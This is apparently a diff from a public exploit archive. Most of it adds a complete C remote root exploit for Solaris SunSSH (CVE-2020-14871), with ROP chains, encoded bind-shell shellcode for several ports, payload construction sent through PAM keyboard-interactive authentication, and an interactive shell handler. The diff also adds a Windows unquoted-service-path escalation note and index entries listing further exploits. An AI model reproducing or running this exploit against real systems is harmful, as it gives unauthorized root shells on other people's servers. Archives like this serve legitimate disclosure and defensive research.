+	"\xc3\x31\x04\x08"  // overwrite %ebp unused
+	"\x73\x6a\xd7\xfe"  // mov $0x74, %eax ; ret
+	"\xb1\x26\x07\x08"  // pop %ebx ; ret
+	"\xff\x01\xac\xfe"  // write garbage here, unused gadget
+	"\x98\xb9\x05\x08"  // pop %edx ; pop %ebp ; ret
+	"\xff\x2f\x04\x08"  // %edx pointer to page
+	"\xc3\x31\x04\x08"  // unused %ebp value
+	"\x57\xaa\xe4\xfe"  // pop %ecx ; ret
+	"\x94\x11\x5f\xfe"  // ptr rwx (0x?,0x04b,0xe50,0x7)
+	"\xee\x6a\x65\xfe"  // inc %edx ; ret
+	"\x9b\xc5\xc1\xfe"  // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret
+	"\x73\x6a\xd7\xfe"  // mov $0x74, %eax ; ret
+	"\x86\xae\xe5\xfe"  // pop %edx ; ret
+	"\xc3\x31\x04\x08"  // shellcode return address for %edx
+	"\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx)
+	{"Solaris all Sun_SSH_1.x.x debug crash target",
+	"\x41\x42\x43\x43"  // %ebp ptr
+	"\x78\x79\x80\x81"} // %eip ptr
+};
+
+const int shellno = 4;
+
+struct shellcode shellcodes[] = {
+	{"Solaris x86 bindshell tcp port 9999",
+	/* mprotect magic stub necessary for payloads expecting +x stack */
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
+	"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
+	"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
+	/* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07);
+	   ==================================================================
+		xorl %eax, %eax
+  		xorl %ecx, %ecx
+  		movl $0x08041001, %ebx
+  		movw $0x7001, %ax
+  		movb $0x7,%cl
+  		dec %ebx
+  		dec %eax
+  		pushl %ecx
+  		pushl %eax
+  		pushl %ebx
+  		pushl %ebx
+  		movl %esp, %ecx
+  		xorl %eax, %eax
+		movb $0x74, %al
+		int $0x91
+	*/
+	/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */
+	"\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde"
+        "\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e"
+        "\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69"
+        "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
+        "\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
+        "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
+        "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
+        "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
+        "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
+        "\xb1\x3a\xfe\xd7\x2a\x95"},
+	{"Solaris x86 bindshell tcp port 8080",
+	/* mprotect magic stub necessary for payloads expecting +x stack */
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9"
+	"\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50"
+	"\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91"
+	/* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */
+	"\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde"
+	"\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e"
+	"\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69"
+	"\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1"
+	"\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b"
+	"\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7"
+	"\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51"
+	"\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72"
+	"\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52"
+	"\xb1\x3a\xfe\xd7\x44\x60"},
+	/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ 
+	{"Solaris 11.0 x86 bindshell tcp port 9999", 
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
+	"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
+	"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
+	"\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
+	"\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd"
+	"\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6"
+	"\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c"
+	"\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7"
+	"\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35"
+	"\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72"
+	"\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97"
+	"\x9f\x56\x1b\x2c\xdf\x8f"},
+	/* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */
+	{"Solaris 11.0 x86 bindshell tcp port 4444", 
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70"
+	"\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89"
+	"\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different
+	"\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
+	"\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1"
+	"\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2"
+	"\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46"
+	"\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47"
+	"\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae"
+	"\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5"
+	"\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0"
+	"\x0a\x39\x6b\xeb\x53\x6b"}
+};
+
+void spawn_shell(int sd) {
+#define sockbuflen 2048
+	int rcv;
+	char sockbuf[sockbuflen];
+	fd_set readfds;
+	memset(sockbuf,0,sockbuflen);
+	snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n");
+	write(sd,sockbuf,strlen(sockbuf));
+	while (1) {
+		FD_ZERO(&readfds);
+		FD_SET(0,&readfds);
+		FD_SET(sd,&readfds);
+		select(255,&readfds,NULL,NULL,NULL);
+		if (FD_ISSET(sd, &readfds)) {
+			memset(sockbuf,0,sockbuflen);
+			rcv = read(sd,sockbuf,sockbuflen);
+			if (rcv <= 0) {
+              			printf("\e[1m\e[34m[!] connection closed by foreign host.\n\e[0m");
+              			exit(-1);
+            		}
+			printf("%s",sockbuf);
+			fflush(stdout);
+		}
+      		if(FD_ISSET(0,&readfds)) {
+			memset(sockbuf,0,sockbuflen);
+			read(0,sockbuf,sockbuflen);
+			write(sd,sockbuf,strlen(sockbuf));
+        	}
+    	}
+}
+
+void bindshell_setup(short port){
+	oldsd = sd;
+        sd = socket(AF_INET,SOCK_STREAM,0);
+        sain.sin_port = htons(port);
+        if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){
+		printf("[!] fatal bind shell failed\n\e[0m");
+                exit(-1);
+        }
+	printf("[-] connected.. enjoy :)\e[0m\n");
+        spawn_shell(sd);
+}
+
+void on_alarm(int signum){
+	printf("[+] exploit success, handling payload...\n");
+	if(ishell==0||ishell==2){
+		bindshell_setup(9999);
+	}
+	if(ishell==1||ishell==3){
+		bindshell_setup(8080);
+	}
+	printf("[-] exploit complete\n\e[0m");
+	exit(0);
+}
+
+void on_interrupt(int signum){
+	printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m");
+	if(sd){
+		close(sd);
+	}
+	if(oldsd){
+		close(oldsd);
+	}
+	exit(0);
+}
+
+void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */
+#define payload_size 4096
+	int len = strlen(payload);
+	buf = malloc(payload_size);
+	char randchar = 'A';
+	char* randbuf = malloc(2);
+	if(!buf||!randbuf){
+		printf("[!] fatal payload buffer error\n");
+		exit(-1);
+	}
+	srand(time(NULL));
+	memset(buf,'\x00',payload_size);
+	memset(randbuf,0,2);
+	printf("[-] shellcode length %d bytes\n",len);
+	if(len < 512 && payload_size > 1024){
+		memcpy(buf,payload,len);
+		for(int i =0;i <= (512 - len);i++){
+ 			randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52];
+			memcpy(randbuf,&randchar,1);
+			strcat(buf,randbuf);
+		}
+		len = strlen(retaddr);
+		printf("[-] rop chain length %d\n",len);
+		if(len + 512 < payload_size){
+			memcpy((void*)(long)buf+512,(void*)retaddr,len);
+			len = strlen(buf);
+			printf("[-] exploit buffer length %d\n",len);
+		}
+		else{
+			printf("[!] exploit buffer miscalculated\n");
+			exit(-1);
+		}
+	}
+	else{
+		printf("[!] exploit buffer miscalculated\n");
+		exit(-1);
+	}
+}
+
+static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) {
+	int i = 0;
+	signal(SIGALRM, &on_alarm);
+	printf("[+] entering keyboard-interactive authentication.\n");
+	printf("[-] number of prompts: %d\n", num_prompts);
+	printf("[-] prompt %d from server: '", i);
+	fwrite(prompts[i].text, 1, prompts[i].length, stdout);
+	printf("'\n");
+	prepare_payload();
+	//uncomment to pause for gdb debugging
+	//sleep(10);
+	responses[i].text = strdup(buf);
+	responses[i].length = strlen(buf);
+	printf("[-] sending exploit magic buffer... wait\n");
+	alarm(5);
+}
+
+int main(int argc,char **argv){
+	int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0;
+	char* host;
+	int i, type, exitcode;
+	unsigned long hostaddr;
+	const char *fingerprint;
+	LIBSSH2_SESSION *session;
+	LIBSSH2_CHANNEL *channel;
+	char *exitsignal = (char *)"none";
+	size_t len;
+	LIBSSH2_KNOWNHOSTS *nh;
+	static struct option options[] = {
+		{"server", 1, 0, 's'},
+		{"port", 1, 0, 'p'},
+		{"target", 1, 0, 't'},
+		{"shellcode", 1, 0, 'x'},
+		{"help", 0, 0,'h'}
+        };
+	printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n");
+	while(rc != -1) {
+	        rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index);
+        	switch(rc) {
+               		case -1:
+	                        break;
+        	        case 's':
+				if(ihost==0){
+					host = malloc(strlen(optarg) + 1);
+					if(host){
+						sprintf(host,"%s",optarg);
+						ihost = 1;
+					}
+				}
+               			break;
+	                case 'p':
+				port = atoi(optarg);
+                	        break;
+			case 'x':
+				if(ishell==-1) {
+					rc = atoi(optarg);
+					switch(rc){
+						case 0:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+						case 1:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+						case 2:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+						case 3:
+							printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode));
+							payload = malloc(strlen(shellcodes[rc].shellcode)+1);
+							if(payload){
+								memset(payload,0,strlen(shellcodes[rc].shellcode)+1);
+								memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode));
+								ishell = rc;
+							}
+							break;
+
+						default:
+							printf("[!] Invalid shellcode selection %d\n",rc);
+							exit(0);
+							break;
+						}
+				}
+				break;
+	                case 't':
+				if(itarg==0){
+					rc = atoi(optarg);
+					switch(rc){
+						case 0:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 1:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 2:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 3:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						case 4:
+							printf("[-] chosen target '%s'\n",targets[rc].name);
+							retaddr = malloc(strlen(targets[rc].ropchain)+1);
+							if(retaddr){
+								memset(retaddr,0,strlen(targets[rc].ropchain)+1);
+								memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain));
+								itarg = rc;
+							}
+							break;
+						default:
+							printf("[!] Invalid target selection %d\n", rc);
+							exit(0);
+							break;
+					}
+					itarg = 1;
+				}
+        	                break;
+			case 'h':
+				printf("[!] Usage instructions.\n[\n");
+				printf("[ %s <required> (optional)\n[\n[   --server|-s <ip/hostname>\n",argv[0]);
+				printf("[   --port|-p (port)[default 22]\n[   --target|-t <target#>\n");
+				printf("[   --shellcode|-x <shellcode#>\n[\n");
+				printf("[ Target#'s\n");
+				for(i = 0;i <= targetno - 1;i++){
+					printf("[ %d \"%s\"\n",i,targets[i]);
+				}
+				printf("[\n[ Shellcode#'s\n");
+				for(i = 0;i <= shellno - 1;i++){
+					printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode));
+				}
+				printf("\e[0m");
+				exit(0);
+				break;
+			default:
+                		break;
+	        }
+	}
+	if(itarg != 1 || ihost  != 1 || ishell < 0){
+		printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]);
+		exit(-1);
+	}
+	rc = libssh2_init(0);
+	hostaddr = inet_addr(host);
+	sd = socket(AF_INET, SOCK_STREAM, 0);
+	sain.sin_family = AF_INET;
+	sain.sin_port = htons(port);
+	sain.sin_addr.s_addr = hostaddr;
+	if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) {
+		fprintf(stderr, "[!] failed to connect!\n");
+		goto shutdown;
+	}
+	session = libssh2_session_init();
+	libssh2_session_set_blocking(session, 1);
+	while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN);
+	if(rc) {
+		printf("[!] failure establishing ssh session: %d\n", rc);
+		goto shutdown;
+	}
+	nh = libssh2_knownhost_init(session);
+	if(!nh) {
+		printf("[!] failure on libssh2 init\n");
+		goto shutdown;
+	}
+	fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);
+	printf("[+] ssh host fingerprint: ");
+	for(i = 0; i < 20; i++) {
+		printf("%02x", (unsigned char)fingerprint[i]);
+	}
+	printf("\n");
+	libssh2_knownhost_free(nh);
+	signal(SIGINT,&on_interrupt);
+	libssh2_userauth_keyboard_interactive(session, "", &kbd_callback);
+	printf("[!] exploit failed, core maybe on target!\n");
+shutdown:
+	if(sd){
+		close(sd);
+	}
+	printf("\e[0m");
+	return -2;
+}
\ No newline at end of file
diff --git a/exploits/windows/local/49248.txt b/exploits/windows/local/49248.txt
new file mode 100644
index 000000000..3b3f8ec5f
--- /dev/null
+++ b/exploits/windows/local/49248.txt
@@ -0,0 +1,29 @@
+# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
+# Date: 2020-10-14
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://systemexplorer.net/
+# Software Link:  http://systemexplorer.net/download/SystemExplorerSetup.exe
+# Version: Version 7.0.0
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Service info:
+
+C:\Users\m507>sc qc SystemExplorerHelpService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SystemExplorerHelpService
+        TYPE               : 20  WIN32_SHARE_PROCESS
+        START_TYPE         : 3   DEMAND_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : System Explorer Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 68282e8af..1bda1cfd5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11230,6 +11230,8 @@ id,file,description,date,author,type,platform,port
 49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
+49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
+49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -18339,6 +18341,7 @@ id,file,description,date,author,type,platform,port
 49216,exploits/windows/remote/49216.py,"SmarterMail Build 6985 - Remote Code Execution",2020-12-09,1F98D,remote,windows,
 49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows,
 49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
+49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43463,3 +43466,18 @@ id,file,description,date,author,type,platform,port
 49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php,
 49242,exploits/php/webapps/49242.txt,"Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
 49243,exploits/php/webapps/49243.txt,"Courier Management System 1.0 - 'ref_no' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
+49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php,
+49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple,
+49247,exploits/multiple/webapps/49247.py,"MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)",2020-12-14,securityforeveryone.com,webapps,multiple,
+49249,exploits/multiple/webapps/49249.txt,"Seacms 11.1 - 'ip and weburl' Remote Command Execution",2020-12-14,j5s,webapps,multiple,
+49250,exploits/multiple/webapps/49250.txt,"Seacms 11.1 - 'file' Local File Inclusion",2020-12-14,j5s,webapps,multiple,
+49251,exploits/multiple/webapps/49251.txt,"Seacms 11.1 - 'checkuser' Stored XSS",2020-12-14,j5s,webapps,multiple,
+49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,
+49253,exploits/multiple/webapps/49253.txt,"Rumble Mail Server 0.51.3135 - 'servername' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
+49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,
+49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
+49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
+49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,